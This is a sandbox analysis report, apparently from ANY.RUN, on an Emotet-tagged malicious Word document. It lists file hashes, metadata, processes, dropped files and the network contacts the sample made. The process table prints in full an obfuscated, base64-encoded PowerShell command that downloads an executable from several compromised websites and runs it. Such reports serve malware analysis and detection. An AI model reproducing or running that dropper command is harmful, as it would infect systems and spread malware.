File name: | za1.doc |
Full analysis: | https://app.any.run/tasks/f3bae1f7-6afe-4d3b-8f3d-005bbf3be28a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 20, 2019, 12:43:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: South Carolina Factors proactive, Subject: heuristic, Author: Summer Considine, Comments: Small interface, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu May 16 07:40:00 2019, Last Saved Time/Date: Thu May 16 07:40:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 169, Security: 0 |
MD5: | 1FDA265953F1A6B8D11AC8F17437FF13 |
SHA1: | D1301EAAFABE82A8F635B1423675C9450FCC67C3 |
SHA256: | AEFB5DEA65BFCC5D6691ECB2C8F263FA274B7FEA8944C660BA0F7FA8B59A7642 |
SSDEEP: | 3072:U77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q5v00onxZp1D1sluc7Ku:U77HUUUUUUUUUUUUUUUUUUUT52VOs0o+ |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserTypeLen: | 32 |
---|---|
CompObjUserType: | Microsoft Word 97-2003 Document |
Title: | South Carolina Factors proactive |
Subject: | heuristic |
Author: | Summer Considine |
Keywords: | - |
Comments: | Small interface |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:05:16 06:40:00 |
ModifyDate: | 2019:05:16 06:40:00 |
Pages: | 1 |
Words: | 29 |
Characters: | 169 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Sipes and Sons |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 197 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Kemmer |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2480 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\za1.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3176 | PowErsHell -enC JABpADIANwA4ADAAMgA4AD0AJwB6ADgAMgA1ADUAMgAnADsAJAB2ADYAOAAyADAAMAAgAD0AIAAnADEANgA1ACcAOwAkAEsAOAAyADUANAA5ADcANgA9ACcAUgA4ADUANgA2ADkAOABfACcAOwAkAEgAMwA1ADEANwA1AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB2ADYAOAAyADAAMAArACcALgBlAHgAZQAnADsAJABNAF8ANgAyADkANwA9ACcAcgA2ADQANgBfADEAJwA7ACQAawAzADYAMgAwADQAXwA9ACYAKAAnAG4AJwArACcAZQB3AC0AJwArACcAbwBiAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAQgBgAGMAYABsAGkAYABFAGAATgBUADsAJAB2ADMAMAA5ADcANAAxAD0AJwBoAHQAdABwAHMAOgAvAC8AYQBuAG4AaQBsAG8AcABwAG8AbgBlAG4ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwB3AG8ANAB1ADMAMQAzADQALwBAAGgAdAB0AHAAOgAvAC8AdwBvAHIAZABwAHIAZQBzAHMALQAyADYAOQA5ADYAMQAtADgAMwA4ADQANQA4AC4AYwBsAG8AdQBkAHcAYQB5AHMAYQBwAHAAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AbgBjAGEAYQA2ADEALwBAAGgAdAB0AHAAOgAvAC8AagB1AGIAaQBsAGUAbgBnAHUAYQAuAGMAbwBtAC8AdwBwAC8AcABjAHAAZQBmADMAMwAxAC8AQABoAHQAdABwADoALwAvAGIAdQBzAGkAbgBlAHMAcwBmAGkAeABuAG8AdwAuAGMAbwBtAC8AdwBwAC8AMwBvAGcANwBtADMAMwA2ADEALwBAAGgAdAB0AHAAOgAvAC8AZABvAG0AbwB0AGkAYwBhAHYAaQBjAC4AYwBvAG0ALwBpAHQAYQB1AC8AdQA1AGEANAAxAC8AJwAuAFMAUABsAEkAVAAoACcAQAAnACkAOwAkAE0AMgA5ADkAMQA0ADYAPQAnAGkANwAzADgANwA4ADMANAAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwA5ADIANAAxADUAIABpAG4AIAAkAHYAMwAwADkANwA0ADEAKQB7AHQAcgB5AHsAJABrADMANgAyADAANABfAC4AZABPAHcATgBMAE8AQQBEAGYAaQBsAEUAKAAkAFMAOQAyADQAMQA1ACwAIAAkAEgAMwA1ADEANwA1ACkAOwAkAE0AMgBfADgAOAAyADYAPQAnAGMAOQA4ADUAMABfACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASAAzADUAMQA3ADUAKQAuAEwAZQBOAGcAdABIACAALQBnAGUAIAAzADEANAAxADQAKQAgAHsALgAoACcASQAnACsAJwBuAHYAJwArACcAbwBrAGUALQBJAHQAZQBtACcAKQAgACQASAAzADUAMQA3ADUAOwAkAEIANAAwADUAOAAyAD0AJwBZADYAMwAwADEAMgAnADsAYgByAGUAYQBrADsAJABWADUANAA1ADIAOAA2AD0AJwBPADIAXwAyADQAOAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFIANwA4ADkANgA5AD0AJwBoADEANQAzADYAOAA4ACcA | C:\Windows\System32\WindowsPowerShell\v1.0\PowErsHell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F9C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3176 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NXQKKOHFQVVISVZFJFFT.temp | — | |
MD5:— | SHA256:— | |||
3176 | PowErsHell.exe | C:\Users\admin\165.exe | — | |
MD5:— | SHA256:— | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$za1.doc | pgc | |
MD5:9C2C9AFCBE27A29BB04008A2DB6029EB | SHA256:7A48F2E799A792965B4796A176C938711F0F4451CEB7C2C35FB0DDD822DBF795 | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8D18E4D0.wmf | wmf | |
MD5:7B2FCB15B8B0FA1CB42261940D9179A2 | SHA256:E6EA9D892F10BCEF0C1A34089ECEB285D73D3621ECDCBA8C73517C4F98EF9ED2 | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D34AC544.wmf | wmf | |
MD5:DEBC834E679FA8C09C59BA1D55A2D921 | SHA256:062E34C3D3F5525DB5BFBC64369D3BF999179D900AEAC44BCF5C6D418D877B6C | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:3107227F47377D26DFEB4773A6AFB83A | SHA256:4EE8125788061B77C12B0342B95E5F66F95A1F848A3B39220512773F24BA77B3 | |||
3176 | PowErsHell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E3A0FF2.wmf | wmf | |
MD5:C0A5C41231FA91F0AB6CD87F4D06258F | SHA256:62D40E3EC31B73C9CFC2E429C61ECE1A55B4F02610F41D10C9C46FD87EBE10BE | |||
2480 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D543335E.wmf | wmf | |
MD5:022A9D466F666D42CECEE0ABE775B697 | SHA256:C919C0D968460BF2684ABEF039EF174851EC340DEA063EEC3343430D24DEB0C7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3176 | PowErsHell.exe | GET | 403 | 134.0.8.99:80 | http://jubilengua.com/wp/pcpef331/ | ES | html | 214 b | suspicious |
3176 | PowErsHell.exe | GET | 403 | 31.47.74.167:80 | http://domoticavic.com/itau/u5a41/ | ES | html | 72.1 Kb | suspicious |
3176 | PowErsHell.exe | GET | 200 | 216.194.166.182:80 | http://businessfixnow.com/wp/3og7m3361/ | US | html | 27.2 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3176 | PowErsHell.exe | 37.139.14.80:443 | annilopponen.com | Digital Ocean, Inc. | NL | unknown |
3176 | PowErsHell.exe | 134.0.8.99:80 | jubilengua.com | 10dencehispahard, S.L. | ES | suspicious |
3176 | PowErsHell.exe | 216.194.166.182:80 | businessfixnow.com | InMotion Hosting, Inc. | US | unknown |
3176 | PowErsHell.exe | 31.47.74.167:80 | domoticavic.com | Tecnocratica Centro de Datos, S.L. | ES | suspicious |
Domain | IP | Reputation |
---|---|---|
annilopponen.com |
| suspicious |
dns.msftncsi.com |
| shared |
wordpress-269961-838458.cloudwaysapps.com |
| unknown |
jubilengua.com |
| suspicious |
businessfixnow.com |
| unknown |
domoticavic.com |
| suspicious |